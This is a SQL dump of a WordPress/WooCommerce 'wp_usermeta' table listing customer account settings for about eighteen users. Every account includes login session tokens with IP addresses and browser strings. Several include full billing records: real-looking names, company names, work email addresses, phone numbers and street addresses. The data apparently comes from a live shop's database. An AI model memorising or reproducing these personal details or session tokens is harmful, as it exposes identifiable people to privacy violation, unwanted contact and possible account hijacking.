INSERT INTO `wp_usermeta` VALUES (7173, 425, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7174, 425, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7175, 425, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7176, 425, '_yoast_wpseo_profile_updated', '1486434143'); 
INSERT INTO `wp_usermeta` VALUES (7178, 425, 'session_tokens', 'a:1:{s:64:"6005b4171c93eb497697eb38faa658260bb162fe14288d7c23be58b02eec6a7c";a:4:{s:10:"expiration";i:1486607085;s:2:"ip";s:14:"116.247.110.57";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486434285;}}'); 
INSERT INTO `wp_usermeta` VALUES (7179, 425, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7180, 426, 'nickname', 'tpetcavage'); 
INSERT INTO `wp_usermeta` VALUES (7181, 426, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7182, 426, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7183, 426, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7184, 426, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7185, 426, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7186, 426, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7187, 426, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7188, 426, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7189, 426, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7190, 426, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7191, 426, '_yoast_wpseo_profile_updated', '1486477559'); 
INSERT INTO `wp_usermeta` VALUES (7192, 426, 'session_tokens', 'a:1:{s:64:"130152a7caa6ac45c67b73259919cae61e1f44c59631de4b5c235e39bca53859";a:4:{s:10:"expiration";i:1487687160;s:2:"ip";s:13:"216.82.243.88";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486477560;}}'); 
INSERT INTO `wp_usermeta` VALUES (7193, 427, 'nickname', 'purchasing3'); 
INSERT INTO `wp_usermeta` VALUES (7194, 427, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7195, 427, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7196, 427, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7197, 427, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7198, 427, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7199, 427, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7200, 427, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7201, 427, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7202, 427, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7203, 427, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7204, 427, '_yoast_wpseo_profile_updated', '1486478839'); 
INSERT INTO `wp_usermeta` VALUES (7205, 427, 'session_tokens', 'a:1:{s:64:"762ffc61b9ed887c717a6ebbefaf69b25e2303f869e298fd67b399c19fb974d2";a:4:{s:10:"expiration";i:1487688440;s:2:"ip";s:15:"208.105.235.194";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1486478840;}}'); 
INSERT INTO `wp_usermeta` VALUES (7206, 416, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7207, 428, 'nickname', 'thokanson'); 
INSERT INTO `wp_usermeta` VALUES (7208, 428, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7209, 428, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7210, 428, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7211, 428, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7212, 428, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7213, 428, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7214, 428, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7215, 428, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7216, 428, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7217, 428, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7218, 428, '_yoast_wpseo_profile_updated', '1486490234'); 
INSERT INTO `wp_usermeta` VALUES (7219, 428, 'session_tokens', 'a:1:{s:64:"c033d43962dbb8ccd1184f8f1263008986f827a10ce6f509a0dc036f560b56a2";a:4:{s:10:"expiration";i:1487699835;s:2:"ip";s:15:"108.171.131.189";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486490235;}}'); 
INSERT INTO `wp_usermeta` VALUES (7220, 428, 'billing_first_name', 'Teresa'); 
INSERT INTO `wp_usermeta` VALUES (7221, 428, 'billing_last_name', 'Hokanson'); 
INSERT INTO `wp_usermeta` VALUES (7222, 428, 'billing_company', 'HISCO, INC.'); 
INSERT INTO `wp_usermeta` VALUES (7223, 428, 'billing_email', 'thokanson@hiscoinc.com'); 
INSERT INTO `wp_usermeta` VALUES (7224, 428, 'billing_phone', '714-777-2661'); 
INSERT INTO `wp_usermeta` VALUES (7225, 428, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7226, 428, 'billing_address_1', '6650 CONCORD PARK DRIVE'); 
INSERT INTO `wp_usermeta` VALUES (7227, 428, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (7228, 428, 'billing_city', 'HOUSTON'); 
INSERT INTO `wp_usermeta` VALUES (7229, 428, 'billing_state', 'TX'); 
INSERT INTO `wp_usermeta` VALUES (7230, 428, 'billing_postcode', '77040-4098'); 
INSERT INTO `wp_usermeta` VALUES (7231, 428, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7232, 429, 'nickname', 'debandrew1970'); 
INSERT INTO `wp_usermeta` VALUES (7233, 429, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7234, 429, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7235, 429, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7236, 429, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7237, 429, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7238, 429, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7239, 429, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7240, 429, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7241, 429, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7242, 429, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7243, 429, '_yoast_wpseo_profile_updated', '1486492722'); 
INSERT INTO `wp_usermeta` VALUES (7244, 429, 'session_tokens', 'a:1:{s:64:"04873ecba12472a1d37352c11a22c5f9b2561d297d4074ce08db8128218b8122";a:4:{s:10:"expiration";i:1487702323;s:2:"ip";s:13:"74.113.182.22";s:2:"ua";s:117:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8";s:5:"login";i:1486492723;}}'); 
INSERT INTO `wp_usermeta` VALUES (7245, 430, 'nickname', 'dynacon.electronics'); 
INSERT INTO `wp_usermeta` VALUES (7246, 430, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7247, 430, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7248, 430, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7249, 430, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7250, 430, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7251, 430, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7252, 430, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7253, 430, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7254, 430, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7255, 430, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7256, 430, '_yoast_wpseo_profile_updated', '1486498371'); 
INSERT INTO `wp_usermeta` VALUES (7257, 430, 'session_tokens', 'a:1:{s:64:"fad354b168231a3066166f861b05779c0ce8b07ae2340f9e62a472a63b985c19";a:4:{s:10:"expiration";i:1487707972;s:2:"ip";s:15:"108.171.131.188";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0";s:5:"login";i:1486498372;}}'); 
INSERT INTO `wp_usermeta` VALUES (7258, 431, 'nickname', 'oasisngvpd'); 
INSERT INTO `wp_usermeta` VALUES (7259, 431, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7260, 431, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7261, 431, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7262, 431, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7263, 431, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7264, 431, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7265, 431, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7266, 431, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7267, 431, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7268, 431, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7269, 431, '_yoast_wpseo_profile_updated', '1486498641'); 
INSERT INTO `wp_usermeta` VALUES (7270, 431, 'session_tokens', 'a:1:{s:64:"5585d7752991d7e8cfa8efa6e86fe707ff21672be8d3075646643a928c03294a";a:4:{s:10:"expiration";i:1487708242;s:2:"ip";s:12:"203.94.32.57";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1486498642;}}'); 
INSERT INTO `wp_usermeta` VALUES (7271, 432, 'nickname', 'simsun808'); 
INSERT INTO `wp_usermeta` VALUES (7272, 432, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7273, 432, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7274, 432, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7275, 432, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7276, 432, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7277, 432, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7278, 432, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7279, 432, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7280, 432, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7281, 432, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7282, 432, '_yoast_wpseo_profile_updated', '1486536889'); 
INSERT INTO `wp_usermeta` VALUES (7283, 432, 'session_tokens', 'a:2:{s:64:"23976bf092123e942cb7ea4ea184132df4a7eee7b1f139cd4e1599ffbabd4e32";a:4:{s:10:"expiration";i:1487746490;s:2:"ip";s:12:"218.146.32.9";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486536890;}s:64:"0ea43414b4daebda442898a12c98119e6eb79c199ac9c48e659c53e8d17543b7";a:4:{s:10:"expiration";i:1486709713;s:2:"ip";s:12:"218.146.32.9";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486536913;}}'); 
INSERT INTO `wp_usermeta` VALUES (7284, 433, 'nickname', 'yamadayc'); 
INSERT INTO `wp_usermeta` VALUES (7285, 433, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7286, 433, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7287, 433, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7288, 433, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7289, 433, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7290, 433, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7291, 433, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7292, 433, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7293, 433, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7294, 433, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7295, 433, '_yoast_wpseo_profile_updated', '1486541357'); 
INSERT INTO `wp_usermeta` VALUES (7296, 433, 'session_tokens', 'a:1:{s:64:"e30495d6be517e7e44ce1f83024b1da417ec34fbfa6b2156ccf87e9c4bf39be1";a:4:{s:10:"expiration";i:1487750958;s:2:"ip";s:13:"106.187.60.32";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486541358;}}'); 
INSERT INTO `wp_usermeta` VALUES (7297, 434, 'nickname', 'celiason'); 
INSERT INTO `wp_usermeta` VALUES (7298, 434, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7299, 434, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7300, 434, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7301, 434, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7302, 434, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7303, 434, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7304, 434, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7305, 434, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7306, 434, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7307, 434, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7308, 434, '_yoast_wpseo_profile_updated', '1486572921'); 
INSERT INTO `wp_usermeta` VALUES (7309, 434, 'session_tokens', 'a:1:{s:64:"a9b4abb9b3150c164157b99e6cc22058075f50c3a839850e9a8292cbb7068942";a:4:{s:10:"expiration";i:1487782522;s:2:"ip";s:13:"74.113.53.162";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486572922;}}'); 
INSERT INTO `wp_usermeta` VALUES (7310, 435, 'nickname', 'brgray'); 
INSERT INTO `wp_usermeta` VALUES (7311, 435, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7312, 435, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7313, 435, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7314, 435, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7315, 435, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7316, 435, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7317, 435, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7318, 435, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7319, 435, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7320, 435, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7321, 435, '_yoast_wpseo_profile_updated', '1486576348'); 
INSERT INTO `wp_usermeta` VALUES (7322, 435, 'session_tokens', 'a:1:{s:64:"286a01e14dbaa60acfdd69b6810e7c664e5a1cccb414f2a0acf2b8b1bc57d212";a:4:{s:10:"expiration";i:1487785949;s:2:"ip";s:15:"199.168.151.160";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1486576349;}}'); 
INSERT INTO `wp_usermeta` VALUES (7323, 436, 'nickname', 'john.hartmann'); 
INSERT INTO `wp_usermeta` VALUES (7324, 436, 'first_name', 'John'); 
INSERT INTO `wp_usermeta` VALUES (7325, 436, 'last_name', 'Hartmann'); 
INSERT INTO `wp_usermeta` VALUES (7326, 436, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7327, 436, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7328, 436, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7329, 436, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7330, 436, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7331, 436, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7332, 436, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7333, 436, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7334, 436, '_yoast_wpseo_profile_updated', '1486579218'); 
INSERT INTO `wp_usermeta` VALUES (7335, 436, 'session_tokens', 'a:1:{s:64:"45b9a1bf2c040a682b69ebced780bc30cefa35b7e2ff22f09eb8f81bd13d536c";a:4:{s:10:"expiration";i:1487788819;s:2:"ip";s:15:"199.116.171.107";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486579219;}}'); 
INSERT INTO `wp_usermeta` VALUES (7336, 436, 'billing_first_name', 'John'); 
INSERT INTO `wp_usermeta` VALUES (7337, 436, 'billing_last_name', 'Hartmann'); 
INSERT INTO `wp_usermeta` VALUES (7338, 436, 'billing_company', 'Evonik Corporation'); 
INSERT INTO `wp_usermeta` VALUES (7339, 436, 'billing_email', 'john.hartmann@evonik.com'); 
INSERT INTO `wp_usermeta` VALUES (7340, 436, 'billing_phone', '2157065975'); 
INSERT INTO `wp_usermeta` VALUES (7341, 436, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7342, 436, 'billing_address_1', '723 Electronic Drive'); 
INSERT INTO `wp_usermeta` VALUES (7343, 436, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (7344, 436, 'billing_city', 'Horsham'); 
INSERT INTO `wp_usermeta` VALUES (7345, 436, 'billing_state', 'PA'); 
INSERT INTO `wp_usermeta` VALUES (7346, 436, 'billing_postcode', '19044'); 
INSERT INTO `wp_usermeta` VALUES (7347, 436, 'last_update', '1486579366'); 
INSERT INTO `wp_usermeta` VALUES (7348, 437, 'nickname', 'amanda.m.shalkhauser'); 
INSERT INTO `wp_usermeta` VALUES (7349, 437, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7350, 437, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7351, 437, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7352, 437, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7353, 437, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7354, 437, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7355, 437, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7356, 437, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7357, 437, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7358, 437, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7359, 437, '_yoast_wpseo_profile_updated', '1486581728'); 
INSERT INTO `wp_usermeta` VALUES (7360, 437, 'session_tokens', 'a:1:{s:64:"ba7f792e408a25900191cde8cdc57c9181b930eed79e6e28086e52d19e2313e9";a:4:{s:10:"expiration";i:1502042775;s:2:"ip";s:13:"139.88.104.47";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1501869975;}}'); 
INSERT INTO `wp_usermeta` VALUES (7361, 438, 'nickname', 'SCOTT_BAILEY12'); 
INSERT INTO `wp_usermeta` VALUES (7362, 438, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7363, 438, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7364, 438, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7365, 438, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7366, 438, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7367, 438, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7368, 438, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7369, 438, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7370, 438, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7371, 438, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7372, 438, '_yoast_wpseo_profile_updated', '1486641777'); 
INSERT INTO `wp_usermeta` VALUES (7373, 438, 'session_tokens', 'a:1:{s:64:"c7dcedbee174bdccbc3ea63b96796f6a9e92eaeeb599390e95a12fd65e48db58";a:4:{s:10:"expiration";i:1487851378;s:2:"ip";s:13:"63.159.209.23";s:2:"ua";s:71:"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)";s:5:"login";i:1486641778;}}'); 
INSERT INTO `wp_usermeta` VALUES (7374, 439, 'nickname', 'andre.pelletier'); 
INSERT INTO `wp_usermeta` VALUES (7375, 439, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7376, 439, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7377, 439, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7378, 439, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7379, 439, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7380, 439, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7381, 439, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7382, 439, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7383, 439, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7384, 439, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7385, 439, '_yoast_wpseo_profile_updated', '1486646896'); 
INSERT INTO `wp_usermeta` VALUES (7386, 439, 'session_tokens', 'a:1:{s:64:"b68b23a24c0eba79cacd0b015f7ab16462d4224c4e4a49ffd28c7135026c542c";a:4:{s:10:"expiration";i:1487856497;s:2:"ip";s:15:"205.211.133.128";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486646897;}}'); 
INSERT INTO `wp_usermeta` VALUES (7387, 440, 'nickname', 'nomidbak'); 
INSERT INTO `wp_usermeta` VALUES (7388, 440, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7389, 440, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7390, 440, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7391, 440, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7392, 440, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7393, 440, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7394, 440, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7395, 440, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7396, 440, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7397, 440, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7398, 440, '_yoast_wpseo_profile_updated', '1486742541'); 
INSERT INTO `wp_usermeta` VALUES (7399, 440, 'session_tokens', 'a:1:{s:64:"ff1001099f4feec681c1a6946f452da71988eb3c3d134e5cbe39d849fc34adcb";a:4:{s:10:"expiration";i:1487952142;s:2:"ip";s:13:"148.177.1.213";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486742542;}}'); 
INSERT INTO `wp_usermeta` VALUES (7400, 440, 'billing_first_name', 'Navid'); 
INSERT INTO `wp_usermeta` VALUES (7401, 440, 'billing_last_name', 'Omidbakhsh'); 
INSERT INTO `wp_usermeta` VALUES (7402, 440, 'billing_company', 'Advanced Sterilization Products'); 
INSERT INTO `wp_usermeta` VALUES (7403, 440, 'billing_email', 'nomidbak@its.jnj.com'); 
INSERT INTO `wp_usermeta` VALUES (7404, 440, 'billing_phone', '949-453-6493'); 
INSERT INTO `wp_usermeta` VALUES (7405, 440, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7406, 440, 'billing_address_1', '33 Technology Drive'); 
INSERT INTO `wp_usermeta` VALUES (7407, 440, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (7408, 440, 'billing_city', 'Irvine'); 
INSERT INTO `wp_usermeta` VALUES (7409, 440, 'billing_state', 'CA'); 
INSERT INTO `wp_usermeta` VALUES (7410, 440, 'billing_postcode', '92618'); 
INSERT INTO `wp_usermeta` VALUES (7411, 440, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7412, 441, 'nickname', 'kaitlin.schneider212'); 
INSERT INTO `wp_usermeta` VALUES (7413, 441, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7414, 441, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7415, 441, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7416, 441, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7417, 441, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7418, 441, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7419, 441, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7420, 441, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7421, 441, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7422, 441, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7423, 441, '_yoast_wpseo_profile_updated', '1486747175'); 
INSERT INTO `wp_usermeta` VALUES (7424, 441, 'session_tokens', 'a:1:{s:64:"089172ae361af17a6179181da0c0f542033a869113c41a1a6921ecbf73e8cab6";a:4:{s:10:"expiration";i:1487956776;s:2:"ip";s:14:"140.32.183.252";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486747176;}}'); 
INSERT INTO `wp_usermeta` VALUES (7425, 442, 'nickname', 'inof'); 
INSERT INTO `wp_usermeta` VALUES (7426, 442, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7427, 442, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7428, 442, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7429, 442, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7430, 442, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7431, 442, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7432, 442, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7433, 442, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7434, 442, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7435, 442, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7436, 442, '_yoast_wpseo_profile_updated', '1486786188'); 
